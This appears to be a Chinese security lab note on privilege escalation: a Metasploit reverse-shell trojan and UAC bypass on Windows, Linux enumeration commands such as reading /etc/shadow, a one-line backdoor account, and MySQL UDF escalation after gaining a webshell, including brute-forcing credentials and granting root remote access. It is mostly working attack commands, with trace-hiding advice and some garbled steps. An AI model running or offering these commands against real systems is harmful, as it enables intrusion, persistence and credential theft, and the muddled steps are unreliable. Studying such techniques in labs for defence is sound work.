2020-05-07windows uac、mysql udf提权操作、提权常用命令

一、完成windows UAC提权

木马生成:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.103 LPORT=7777-f exe -o payload.exe

木马生成

将木马下载到物理机：sz payload.exe

将木马放在虚拟机中，最后双击运行

然后创建一个监听器

msfconsole

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) >  set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set lhost 192.168.0.103

lhost => 192.168.0.103

msf5 exploit(multi/handler) > set lport 7777

lport => 7777

msf5 exploit(multi/handler) > exploit

创建监听，木马已上线

输入getuid，查看当前用户，然后输入getsystem，尝试提权，发现失败

当前用户权限

提权失败

meterpreter > background

msf5 exploit(multi/handler) > sessions -i

msf5 exploit(multi/handler) > use exploit/windows/local/bypassuac

msf5 exploit(windows/local/bypassuac) > set session 1

msf5 exploit(windows/local/bypassuac) > exploit

meterpreter > getuid

meterpreter > getsystem

防止被发现，将自动备份的/tmp/passwd.bak覆盖etc/passwd，输入：mv /tmp/passwd.bak /etc/passwd，即可恢复之前的root权限

二、总结Linux提权常用命令和vi编辑器常用命令 

（1）：内核，操作系统和设备信息 

 uname -a    打印所有可用的系统信息 

 uname -r    内核版本 

 hostname   系统主机名 

（2）用户和群组 

 cat /etc/passwd     列出系统上的所有用户 

cat /etc/shadow     列出系统上的所有用户密码  

 whoami              查看当前用户 

w                   谁目前已登录，他们正在做什么

 last                最后登录用户的列表 

 lastlog             所有用户上次登录的信息  

 （3）用户和权限信息： 

 whoami        当前用户名 

 id            当前用户信息 

 cat /etc/sudoers  谁被允许以root身份执行 

sudo -l       当前用户可以以root身份执行操作 

 （4）环境信息  

 history   显示当前用户的历史命令记录 

 pwd       输出工作目录 

 （5）linux 一句话添加账号 

 （1）chpasswd 方法 

 # useradd guest;echo'guest:123456'|chpasswd 

vi编辑器常用命令 

 打开文件：vi  /oldboy/oldboy.txt 

 编辑模式：i 

 保存并退出：esc退出、:wq保存退出 

 显示文件内容检查：cat /oldboy/oldboy.txt 

三、完成mysql udf提权操作

当获取到webshell时，我们可以先找一下它得连接数据库的账号和密码

如何获取mysql账号密码

1.查看网站配置文件。

   如:conn、config、data、sql、common、inc等。

连接数据库，输入密码

2.查看数据库安装路径下的mysql文件，安装目录为/data/mysql/user.myd和user.myi

3.通过暴力破解得到（hscan、Bruter、hydra、脚本木马）

如果用工具爆破的话，前提是打开root的远程访问权限

登录到mysql中，为root进行远程访问的授权，执行下面的命令：

 mysql>GRANT ALL PRIVILEGES ON *.* TO root@"%" IDENTIFIED BY "root";

mysql>flush privileges;

UDF提权（自身功能提权）

1、工具UDF提权

当我们直接点击执行导入目录时，这是失败的如图

我们应该先找到myqsl这个目录

当mysql版本是大于等于5.1时，udf.dll文件是在 默认 C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin\\udf.dll     因为我们这里是在C:\\php\\MySQL\\MySQL Server 5.1\\lib\\plugin\\udf.dll

当小于5.1时，C:\\WINDOWS\\udf.dll   或  C:\\WINDOWS\\system32\\udf.dll

如果找不到    lib和plugin目录时，新建

然后将目录C:\php\MySQL-5.1.50\lib\plugin\复制到，然后点击执行，可能失败，那就将目录的   \  改为  /

成功

成功

然后执行默认的sql命令，只有创建了udf.dll文件才能执行命令，

也可以用脚本本地连接moon.php